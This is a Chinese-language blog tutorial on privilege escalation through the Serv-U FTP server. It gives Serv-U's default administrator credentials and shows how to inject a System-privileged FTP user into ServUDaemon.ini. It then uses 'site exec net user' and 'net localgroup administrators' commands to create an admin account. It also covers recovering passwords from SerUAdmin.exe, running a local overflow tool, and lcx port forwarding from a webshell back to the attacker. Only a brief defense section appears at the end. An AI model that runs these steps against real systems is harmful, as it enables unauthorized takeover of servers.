0x00 serv-u简介

• Serv-U FTP Server，是一种被广泛运用的FTP服务器端软件，支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等
• Serv-u服务具有多个用户
• serv-u默认安装目录:C:\Program Files\rhinosoft.com\serv-U
• serv-u密码文件：ServUDaemon.ini
• 端口号：默认端口是43958
  ServUDaemon.ini中localsetuportNo=端口
• SerUDaemon.ini中修改密码默认重启服务生效，如果想要立即生效，需要在[GLOBAL]字段部分添加ReloadSetting=True，这个语句在Serv-u重新载入ServUDaemon.ini的内容后会自动消失
• serv-u默认管理账号是LocalAdministrator,默认密码是”#l@$ak#.lk;0@P“

0x01 FTP提权方法

1、有修改权限

2、无权限修改

3、serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

4、serv-u ftp转发端口

0x02 有修改权限

步骤如下：

1、判断是否安装serv-u

nmap扫端口确认

2、检查是否有可写权限

一般安装目录 c:\Program Files\Serv-u\SerUDaemon.ini

3、在serv-u中添加用户

在user4=添加一个系统用户

1
2
3
4
5
6
7
8
9
10

[USER=quan|1]                                //用户名
Password=					    //用户密码加密后的密文
HomeDir=c:\ftp\quan             //目录
RelPaths=3 
TimeOut=600                      //超时时间设置
Maintenance=System               //权限
Access1=C:\|RWAMELCDP            //可访问的目录及权限
Access2=d:\|RWAMELCDP            //可访问的目录及权限
Access3=e:\|RWAMELCDP            //可访问的目录及权限
SKEYValues=

加密规则 password=2位随机字符+md5(2位随机字符+123456)

举例：

1
2
3
4
5
6
7
8
9
10
11

[USER=spiger|1]                                //用户名
Password=sbd8b58b5c201ee5cc20f9a8551197d4a5    //用户密码加密后的密文
HomeDir=c:\ftp\seven             //目录
RelPaths=3 
TimeOut=600                      //超时时间设置
Maintenance=System               //权限
Access1=C:\|RWAMELCDP            //可访问的目录及权限
Access2=d:\|RWAMELCDP            //可访问的目录及权限
Access3=e:\|RWAMELCDP            //可访问的目录及权限
SKEYValues=
 

注解：斜杠为理解之用，并非也要予以添加
添加上述代码并保存后，就会在serv-u中添加用户名为spiger，密码是123456。

其中pasword字段中：sb+MD5(sb123456) ，其中sb为随机字符

Access1=C:|RWAMELCDP（这个代表所有权限，包括可执行）

maintenance=system 是代表系统权限 user=你命名的用户

4、连接目标FTP服务器

1

ftp 目标IP地址 刚添加的用户密码

5、利用ftp命令quote site exec添加用户加入administrators权限组

1
2

quote site exec net user quan quan123 /add
quote site exec net localgroup administrators quan /add

0x03 无修改权限

1、利用md5 直接去解密

2、默认用户名密码

账户：LocalAdministrator ，密码：#l@$ak#.lk;0@P
命令：
cmd /c net user quan quan123 /add & net localgroup administrators quan /add

3、不是默认密码时

直接把受害机的SerUAdmin.exe 下载下来
用winhex打开查找LocalAdministrator（选择ANSI字符）进行查找密码

实操：

通过c32hex进行查看，搜索LocalAdministrator字段，

.后面就是密码

serv-u7中管理员的口令在C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain.Archive文件中，破解方法和serv-u6是一样的

0x04 serv-u ftp本地溢出权限提升(使用6.0以及以前版本)

步骤如下：

1、用Serv-U提权综合工具生成提权工具serv_u.exe

2、先上传 serv_u.exe 到一个盘符下

比如是d盘

3、执行命令

1
2
3

d:\serv_u.exe
d:\serv_u.exe “net user quan quan123 /add”
d:\serv_u.exe “net localgroup administrators quan /add” 

注意命令要有引号

0x05 serv-u ftp转发端口

1、lcx端口转发

在目标Webshell上运行LCX命令

1

lcx -slave yourIP 5000 127.0.0.1 43958

在本机上运行

1

lcx -listen 5000 21

2、本机登陆Serv_U

打开本地的SERV_U 在IP上填入127.0.0.1
帐号写LocalAdministrator 密码#l@$ak#.lk;0@P

0x06webshell+serv-u实操

倘若口令更改了大家可以去serv-u的目录（默认路径：C:\Program Files\Serv-U\）找其配置文件（ServUDaemon.ini），在配置文件中有其密码。

webshell里默认的执行。如下操作：

0x07防御方法

1.确保serv-u安装路径只有系统用户访问权限
2.确保建立的ftp账号不要给执行权限
3.修改ftp默认监听端口

0x08m 参考

https://blog.csdn.net/God_XiangYu/article/details/99692269
https://www.cnblogs.com/feizianquan/p/10891352.html
https://www.cnblogs.com/0nc3/p/12097070.html
https://www.cnblogs.com/xishaonian/p/6253115.html

FROM :b0urne.top | Author:b0urne